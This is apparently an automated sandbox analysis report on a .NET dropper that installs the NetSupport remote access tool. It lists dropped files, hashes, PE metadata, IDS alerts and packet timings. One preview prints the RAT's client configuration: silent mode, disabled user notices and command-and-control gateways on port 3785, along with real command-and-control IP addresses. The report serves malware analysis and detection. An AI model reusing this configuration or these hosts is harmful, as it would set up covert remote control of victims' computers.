                                                                                                          Preview:0x822315b....[Client].._present=1..DisableChatMenu=1..DisableDisconnect=1..DisableReplayMenu=1..SecurityKey2=dgAAAMMIrHFRU0tiSzaaF9m1asQA..Protocols=3..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SOS_RShift=0..DisableChat=1..SysTray=0..UnloadMirrorOnDisconnect=0..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\NetSups\client32u.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=ganeres1.com:3785..Port=3785..GSK=EM;A@JFA:D>D@EBIFK:N@FDF..SecondaryGateway=ganeres2.com:3785..SecondaryPort=3785..
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18944
                                                                                                          Entropy (8bit):5.268518137985743
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Mn/g+juoejt267oVz36sV+Vxclf0d3gZwcWCzOW:g1Ac1WgZwQz
                                                                                                          MD5:C4029309233F46F89C99EECA439B279F
                                                                                                          SHA1:07D9A61ADD09A241ABF04AA03D727C78A2CB9932
                                                                                                          SHA-256:AD1712FD9634521ADF14DF34D49234B87731BA87D347F5D1A7E08F356531AD67
                                                                                                          SHA-512:25E76D3D52B8F1B2F597B70297541A06B4E6809EF76B8E27EDE657013FB4634A57DF86289C19EF4F113CC99D738EF2B2DC69F61B9AA44C16BCAFBBD4DF3FB62C
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e...6...6...6..M6...6...7...6...7...6...6...6...7...6...7...6...7...6...7...6..!6...6...7...6Rich...6........PE..L......]...........!.....0..........`1.......@............................................@A.........................:.......P.......p.......................... .......T............................................P......4:..@....................text...3........0.................. ..`.data........@.......4..............@....idata.......P.......6..............@..@.didat.......`.......>..............@....rsrc........p.......@..............@..@.reloc.. ............F..............@..B................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11776
                                                                                                          Entropy (8bit):4.958216172325469
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6W3M4nhhiMUBcky6BY6iyREGa2XsA9EcMZE6f4mg9cT/55Sk4QW3iWwS:thhiMUBY6K6UZxNW3iWN
                                                                                                          MD5:E1E14A4208F014B12732E596AF8B497B
                                                                                                          SHA1:977EDCB5E3BBB964C41466D678FB122B02BC372E
                                                                                                          SHA-256:3044365184CFBFBA62EC55C013D66B1CD8A7F5BCBAAA1E68D58F998FE5A27B44
                                                                                                          SHA-512:99CEEF8A160D1E06726F683951C1CBC5637CA39AC62F938A3F7823192A11E42676717EB65F25DC438208C01D1812A0436040BCF27D9173EDF6581F89F620FEE0
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........j..j..j...N..j.....j.....j..j..j.....j.....j.....j..."..j.....j.Rich.j.................PE..L......[...........!................p........0.....`.........................p............@A......................... .......@.......P.. ....................`..h.......T............................................@...............................text............................... ..`.data...L....0......................@....idata..H....@......................@..@.rsrc... ....P.......&..............@..@.reloc..h....`.......,..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):2.560525784264512
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:eH1GSYWciw1lL/ReD5uIZW072wmgNuKpB35WWdPPYPNy:yYQGLRwcIZWINuyx5WwHg
                                                                                                          MD5:8C3A464EE6AA2B5AA573564D9BD6541D
                                                                                                          SHA1:4868CAC6E7C788BFD736A696F633D8CFD7A620EC
                                                                                                          SHA-256:E5CA3F9B9833184C35AD89F615BF7A5108B7721D685A795CE4019C3D2609FDE6
                                                                                                          SHA-512:71E97D0BE449D9BC423AD253E11AD848BAFFD70B60AD20240224BF04DCA279BAF4ECEC9AD65B72C487715F5A109ECF9EAD6528D758B5696970204953CB9EE5FE
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L...k`c............!.........................................................0......k.....@.......................................... .. ...............................8............................................................................text...............................@..@.rsrc... .... ......................@..@....k`c.........T...8...8.......k`c.........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` .......rsrc$02.... ....,v..Y..b....,1... yU=8Vh)k`c.........................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):14848
Entropy (8bit):5.455474829818716
Encrypted:false
SSDEEP:384:8gRP+xeEPR4l8fxjL9+EM/ko5V5HWLpW:8u+xFPR4lqx0RfO
MD5:0DD075E74F248AEBC50F5A2DCB5BF42B
SHA1:857FD626A19ED5EB99155D71DC2C4293D1A2DF0C
SHA-256:432B1BF04B68942BD54A8DFCE2799D733881351AC9B1FF2F0C4D2EF49F8C3613
SHA-512:9866AF509EF3EE42093BDE90847CA6A8D7B9BFFA5C38474AF16F815689328229B4F21C33A2535A4F86F671B35902668E76CD8E636CD5E726CD5B31D9226B8401
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):21384
Entropy (8bit):6.505465569400541
Encrypted:false
SSDEEP:384:90DT4KNMJFJwjp3/rWcW5gWsHb914gHRN7+X7aJdlGsG:Cw0MnJc3GUbjQ7aJG
MD5:93FD1AFD72BC414788B8422508F69101
SHA1:1E2FCF6B1B1005C7A8E04F3AE18065FB57CBCEB2
SHA-256:8DB18F6CB26D179EE5374DA687A9FDDFCB0B3B2A99346FEAA95844C830BDA606
SHA-512:9A3725D7AEA385DDA331CD569C8B4BE953761E406729F04D4872B3C0EB914B993AD521AD2963C74D59ACE0CEC547E1D20AE18E278FE9A743009D10F9DC838EC1
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18832
Entropy (8bit):6.4434700117269585
Encrypted:false
SSDEEP:384:tKDL6r3uJBAjEOTWikEWEZ1e14gHRN7NslXFTnh:Aa3urdT8GNmt
MD5:0AB5BACD140CB2A1014A2EF49E56A770
SHA1:CE60ADF0EF64B3C0B69F4EC69A7BEA855E448D57
SHA-256:DE699589DB52A7E952B3F2DF186E346B1A68E7AD9F6DC38C390D4A1CEB99FEAC
SHA-512:025B5301320000DCB09EECB4D0B20CC0F991121A4CCC911A88BDE4D83387FC995A84FE7B7E88907A38AEFA9B35B67C29390220743DC193CD938C45D6F798B390
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):773968
Entropy (8bit):6.901559811406837
Encrypted:false
SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
MD5:0E37FBFA79D349D672456923EC5FBBE3
SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2560
Entropy (8bit):2.8002329163397075
Encrypted:false
SSDEEP:24:eH1GSZhLcgqbzC2tACIZW098CQNuv2S435WWdPPYPNyDjrsC:yTLcg12tVIZWO8tulG5WwHgwrs
MD5:84F50C4ACD6A1DEE845DD5B9E9CBFDED
SHA1:337E4B5AE8060F43BBA726E823C6039FB422661C
SHA-256:2E225340E39ABAA2458585573E63E5A54D75228D13B8AF6FBE608CC0D0C15378
SHA-512:573EA97C9DBAE14722902E306D0F88AB54CB9E015F59DA69B680D8075F0E6BD186B99FE7FAAA4EE697C051F4CFA9D583E2AEBAD409D5715FB1465D13C7380050
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2560
Entropy (8bit):2.80282468887158
Encrypted:false
SSDEEP:24:eH1GSPEcpcgKEOlxmM87C2tACIZW0s8A8YNu49hZ35WWdPPYPNyydsC:ybpcgc8O2tVIZWv8ADu4hJ5WwHgFds
MD5:4FCF8ECBD47D01828AA075D9F25DC681
SHA1:1AC5DCD81C3435B41E29F5C564F1D52A1511C69D
SHA-256:2FC489C36E823CDD45A250DC7C9306B8C2A73819D1D054AEAB63FF4E113A8760
SHA-512:952F256D05E23B4D6772B6304F0AA3FB2F7D959C06546937DE7CD62631ACE2CF8110BCF61A448A51974E58C44D6FAE83C942F8F0535F68A6488AE1DAC44730E4
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):328
Entropy (8bit):4.93007757242403
Encrypted:false
SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
MD5:26E28C01461F7E65C402BDF09923D435
SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
Malicious:false
Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):46
Entropy (8bit):4.532048032699691
Encrypted:false
SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
MD5:3BE27483FDCDBF9EBAE93234785235E3
SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
Malicious:false
Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):33144
Entropy (8bit):6.737780491933496
Encrypted:false
SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
MD5:DCDE2248D19C778A41AA165866DD52D0
SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
Malicious:true
Yara Hits:
• Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\DNScache\pcicapi.dll, Author: Joe Security
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):63320
Entropy (8bit):6.439464682558898
Encrypted:false
SSDEEP:1536:bJfanvXuN86jJ9hUHYBlXUYwT24a+yVwQ:lanPGjJTU4IYia+yVX
MD5:35DA3B727567FAB0C7C8426F1261C7F5
SHA1:B71557D67BCD427EF928EFCE7B6A6529226415E6
SHA-256:89027F1449BE9BA1E56DD82D13A947CB3CA319ADFE9782F4874FBDC26DC59D09
SHA-512:14EDADCEECEB95F5C21FD3A0A349DD2A312D1965268610D6A6067049F34E3577FC96F6BA37B1D6AB8CE21444208C462FA97FAB24BBCD77059BC819E12C5EFC5A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
Process: C:\Users\user\Desktop\Jjv9ha2GKn.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MgvjHK5HKH1qHiYHKh3oPtHo6hAHKzea
MD5: EA88ED5AF7CAEBFBCF0F4B4AE0AB2721
SHA1: B2A052ACB64FC7173E568E1520AA4D713C5E90A3
SHA-256: 50FD579DC293CFBE1CF6E5C62E0B4F879B72500000B971CE690F39FA716A3B53
SHA-512: D1B6E5D67808E19A92A2C8BD4C708D13170D1AFD5C3CDFDA873F1C093D80B24D4101325EF20285EEEE8501239F2F1F7FA96C4571390A5B7916DCD3B461B66EC6
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 64489
Entropy (8bit): 7.993298011514335
Encrypted: true
SSDEEP: 1536:NFyQKEjEK5CXhJ8bVSSd1ck0fEHv1gqvK6CeLd2qyV0BlvqMKSK:LPIuCX8SSd1/0fEdDi6hzpPq13
MD5: 6177485D0E1E5E167AB65798E70D44AB
SHA1: 6634623E2B5359BC386A633358ADFD6F4DA9A64C
SHA-256: 7495676881CD5B7D6D09AD43F90529F6E6B2761697E5A24397F8E8E03FAF05DF
SHA-512: 920E5E8CCA53B9C825E7761631F36B61BFE6206EAA734B799BD82201147378EDD2B847EEAD9A66FB1020AC2F488B0CF1EF24FAE34F81AC7237BE6AAA1F26226D
Malicious: false
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 1397545
Entropy (8bit): 7.996586865211503
Encrypted: true
SSDEEP: 24576:ML8FKI/QnVC01gplou+ufwZwNDF3iioYr3oXPrPRB7t6U/9iYTN+sJvRf48c960H:G8N/QnYggLou+ufwZwNDF3D7wnR9iY8r
MD5: 3BE03950993CAB960114E6A5A1D8378E
SHA1: 81C1C423CE16056E361D73B2604BA3440C92F239
SHA-256: 72378062978693700F5DEC49F4E5AF35CF75B7061317766731A25044CFC437E3
SHA-512: C521389A3D1539CE6E560F053DAA6C55219341C48E1CB88346481CE9E1DECE0EEBC6D8E7AFC06C8AD89F103BA191EBBFAEDA84DEF1B5DB659E5C85A98F9146E6
Malicious: false
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 787082
Entropy (8bit): 7.997955572815781
Encrypted: true
SSDEEP: 24576:zKyeop5xuiZil2MroDAQPyLZ5FvFHj60Ywr:zK2lglVG5PWZ5FvcBc
MD5: 26ACC6BCC9C54A6D41233085F7D7CB33
SHA1: 5D19C99C9552332FD35D89B9EE7205133FD0A515
SHA-256: BD409A9F5B3E37A0030D60473800F829417DAA09B69B65E7BD8FEDABEF9DC824
SHA-512: 0E777992563864765923F52B23600DA27697E609767B9C5246CF40E649255970650DD879E4D1E03FC8A6EDC69329247E09A990F177EE486DDBEFCEAE9AECA268
Malicious: false
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type: Zip archive data, at least v2.0 to extract, compression method=deflate
Category: dropped
Size (bytes): 41029
Entropy (8bit): 7.989346444055703
Encrypted: false
SSDEEP: 768:ZBLBjV0IlNtNnLGs6b5SIco4N02W0EdocXH9bziI+Bw0cXMlDB4G:vTNtRLG9bg9ouVENbziVw0c879
MD5: 77DED36570B38B3C9F244ADBFC6599D6
SHA1: 5593CCC6E14D643938EF350BE7763943AD0472E9
SHA-256: F0881EA39F315F08F7BE09ED39A610CE0AC7ABB85430411649D66C45074AC756
SHA-512: A3DD37BFADF540EB9CB26E9A3CE831C393222B5E9B80198DE16A7DD27B74FB89083E5EBCAE178D3CB9DC5C723174EA4B41EC92536085C144E315ECFF64E1C2A5
Malicious: false
Process: C:\Users\user\AppData\Local\DNScache\client32.exe
File Type: ASCII text, with no line terminators
Category: modified
Size (bytes): 16
Entropy (8bit): 3.077819531114783
Encrypted: false
SSDEEP: 3:llD:b
MD5: C40449C13038365A3E45AB4D7F3C2F3E
SHA1: CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
SHA-256: 1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
SHA-512: 3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
Malicious: false
Preview: 40.7357,-74.1724
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 6.255613138289018
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Jjv9ha2GKn.exe
File size: 1'128'960 bytes
MD5: aedf7f67cf6d7f8ef348ba681046fe51
SHA1: 707ac1c67e2d569613c1b5cc3f809d6bd3cddc26
SHA256: 6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0
SHA512: 83297d6611b3c168952c700a10fcca736fe96205298a81eb4d21523b260f933b41f71f4fc9da41b60098d0687d822be6a93b3b29caf692bfaa32e1762a392a01
SSDEEP: 24576:WDXXsCAM4OF+PMwrSVlbmfDYkhDvGtjXtGUAF9kJ7MqudghfEuCj0hThiHHxlhVV:WDXtMw5pwkJ
TLSH: D13518D98EA57226C257F2380F63871E676C2D73E6018A8948839597FE3D34EDC184ED
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<..3.....................>........... ... ....@.. ....................................`................................
Icon Hash: 1016339396b696b3
Entrypoint: 0x51189e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x33121C3C [Mon Feb 24 22:54:52 1997 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x111850 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x112000 | 0x3b9c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x116000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x10f8a4 | 0x10fa00 | 6bc73c5474aae2519b2b72c4408eeef6 | False | 0.5554074508168431 | data | 6.27710859546898 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x112000 | 0x3b9c | 0x3c00 | d89b47806cf5b981a3d7161a0a49e5c2 | False | 0.29153645833333336 | data | 3.875475461642215 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x116000 | 0xc | 0x200 | 2873d1e0dd4afd69465a12cc0a5eb3ca | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x1125e0 | 0x134 | data | | | 0.40584415584415584
RT_CURSOR | 0x112714 | 0x134 | data | | | 0.40584415584415584
RT_BITMAP | 0x112848 | 0x3e8 | Device independent bitmap graphic, 112 x 16 x 4, image size 896, 16 important colors | Hebrew | Israel | 0.383
RT_BITMAP | 0x112c30 | 0xd8 | Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/m | English | United States | 0.4305555555555556
RT_BITMAP | 0x112d08 | 0xd8 | Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/m | English | United States | 0.42592592592592593
RT_ICON | 0x112de0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.16909005628517823
RT_ICON | 0x113e88 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.46365248226950356
RT_ICON | 0x1142f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | | | 0.39864864864864863
RT_MENU | 0x114418 | 0x242 | data | English | United States | 0.48961937716262977
RT_MENU | 0x11465c | 0x1c4 | data | English | United States | 0.4557522123893805
RT_DIALOG | 0x114820 | 0xa2 | data | Hebrew | Israel | 0.7592592592592593
RT_DIALOG | 0x1148c4 | 0x296 | data | Hebrew | Israel | 0.48942598187311176
RT_DIALOG | 0x114b5c | 0x2dc | data | Hebrew | Israel | 0.46584699453551914
RT_DIALOG | 0x114e38 | 0xfa | data | Hebrew | Israel | 0.62
RT_DIALOG | 0x114f34 | 0x336 | data | English | United States | 0.49635036496350365
RT_STRING | 0x11526c | 0x144 | data | English | United States | 0.5308641975308642
RT_STRING | 0x1153b0 | 0x92 | Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0 | English | United States | 0.5068493150684932
RT_STRING | 0x115444 | 0x40 | data | English | United States | 0.640625
RT_STRING | 0x115484 | 0x32 | Matlab v4 mat-file (little endian) I, numeric, rows 0, columns 0 | English | United States | 0.62
RT_STRING | 0x1154b8 | 0x28c | data | English | United States | 0.4125766871165644
RT_STRING | 0x115744 | 0xe2 | Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0 | English | United States | 0.4557522123893805
RT_ACCELERATOR | 0x115828 | 0x30 | data | Hebrew | Israel | 0.9375
RT_GROUP_CURSOR | 0x115858 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x11586c | 0x22 | data | | | 1.0588235294117647
RT_GROUP_ICON | 0x115890 | 0x14 | data | | | 1.25
RT_VERSION | 0x1158a4 | 0x2f8 | data | Hebrew | Israel | 0.4328947368421053
DLL | Import
mscoree.dll | _CorExeMain
Language of compilation system | Country where language is spoken | Map
Hebrew | Israel |
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T08:57:08.084054+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.5 | 49865 | 88.210.12.58 | 3785 | TCP
2024-12-10T08:58:24.482566+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49831 | 23.254.224.41 | 443 | TCP
2024-12-10T08:58:26.643824+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49837 | 23.254.224.41 | 443 | TCP
2024-12-10T08:58:31.227150+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49851 | 23.254.224.41 | 443 | TCP
2024-12-10T08:58:33.561114+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49857 | 23.254.224.41 | 443 | TCP
2024-12-10T08:58:37.212776+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.5 | 49865 | 88.210.12.58 | 3785 | TCP
2024-12-10T08:58:37.654624+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.5 | 49865 | 88.210.12.58 | 3785 | TCP
                                                                                                          Dec 10, 2024 08:58:27.609180927 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.609256029 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.614761114 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.614830017 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.617925882 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.617995977 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.621984005 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.622054100 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.625437021 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.625504017 CET49837443192.168.2.523.254.224.41
                                                                                                          Dec 10, 2024 08:58:27.629324913 CET4434983723.254.224.41192.168.2.5
                                                                                                          Dec 10, 2024 08:58:27.629395962 CET49837443192.168.2.523.254.224.41
